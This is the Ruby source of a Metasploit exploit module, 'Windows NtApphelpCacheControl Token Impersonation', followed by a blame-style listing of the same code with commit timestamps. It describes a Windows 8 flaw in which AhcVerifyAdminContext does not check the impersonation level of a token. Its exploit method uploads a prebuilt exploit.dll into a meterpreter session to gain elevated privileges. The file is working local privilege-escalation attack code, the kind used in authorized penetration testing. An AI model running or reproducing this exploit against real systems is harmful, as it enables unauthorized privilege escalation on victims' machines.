metasploit-framework/modules/exploits/windows/local/ntapphelpcachecontrol.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows NtApphelpCacheControl Token Impersonation',
      'Description'    => %q{
        On Windows 8, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)
        allows application compatibility data to be cached for quick reuse when new processes are created.
        A normal user can query the cache but cannot add new cached entries as the operation is restricted
        to administrators. This is checked in the function AhcVerifyAdminContext.

        This function has a vulnerability where it doesn't correctly check the impersonation token of the
        caller to determine if the user is an administrator. It reads the caller's impersonation token
        using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to
        LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an
        identify token on your thread from a local system process and bypass this check.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Forshaw',
          'sinn3r'
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows 8', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'OSVEB', '116497' ],
          [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']
        ],
      'DisclosureDate' => 'Sep 30 2014',
      'DefaultTarget'  => 0
    }))
  end

  def exploit
    temp = get_env('TEMP')
    if temp.blank?
      print_error("Unable to read TEMP")
      return
    end

    print_status("Loading Exploit Library...")

    session.core.load_library(
      'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", "exploit.dll"),
      'TargetFilePath'  => temp +  "\\ntapphelpcachecontrol.dll",
      'UploadLibrary'   => true,
      'Extension'       => false,
      'SaveToDisk'      => false
    )
  end

end
Template 2015-01-02 17:31:28 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'msf/core/post/windows/reflective_dll_injection'`
			`require 'rex'`

			`class Metasploit3 < Msf::Exploit::Local`
			`Rank = AverageRanking`

			`include Msf::Post::File`
			`include Msf::Post::Windows::Priv`
			`include Msf::Post::Windows::Process`
			`include Msf::Post::Windows::FileInfo`
			`include Msf::Post::Windows::ReflectiveDLLInjection`

			`def initialize(info={})`
			`super(update_info(info, {`
			`'Name' => 'Windows NtApphelpCacheControl Token Impersonation',`
			`'Description' => %q{`
			`On Windows 8, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)`
			`allows application compatibility data to be cached for quick reuse when new processes are created.`
			`A normal user can query the cache but cannot add new cached entries as the operation is restricted`
			`to administrators. This is checked in the function AhcVerifyAdminContext.`

			`This function has a vulnerability where it doesn't correctly check the impersonation token of the`
			`caller to determine if the user is an administrator. It reads the caller's impersonation token`
			`using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to`
			`LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an`
			`identify token on your thread from a local system process and bypass this check.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'James Forshaw',`
			`'sinn3r'`
			`],`
			`'Arch' => ARCH_X86,`
			`'Platform' => 'win',`
			`'SessionTypes' => [ 'meterpreter' ],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'thread',`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows 8', { } ]`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 4096,`
			`'DisableNops' => true`
			`},`
			`'References' =>`
			`[`
			`[ 'OSVEB', '116497' ],`
			`[ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']`
			`],`
			`'DisclosureDate' => 'Sep 30 2014',`
			`'DefaultTarget' => 0`
			`}))`
			`end`

			`def exploit`
Oh so that's it 2015-01-07 16:39:46 +00:00			`temp = get_env('TEMP')`
			`if temp.blank?`
			`print_error("Unable to read TEMP")`
			`return`
Template 2015-01-02 17:31:28 +00:00			`end`

Oh so that's it 2015-01-07 16:39:46 +00:00			`print_status("Loading Exploit Library...")`
Template 2015-01-02 17:31:28 +00:00
Oh so that's it 2015-01-07 16:39:46 +00:00			`session.core.load_library(`
			`'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", "exploit.dll"),`
			`'TargetFilePath' => temp + "\\ntapphelpcachecontrol.dll",`
			`'UploadLibrary' => true,`
			`'Extension' => false,`
			`'SaveToDisk' => false`
			`)`
Template 2015-01-02 17:31:28 +00:00			`end`

			`end`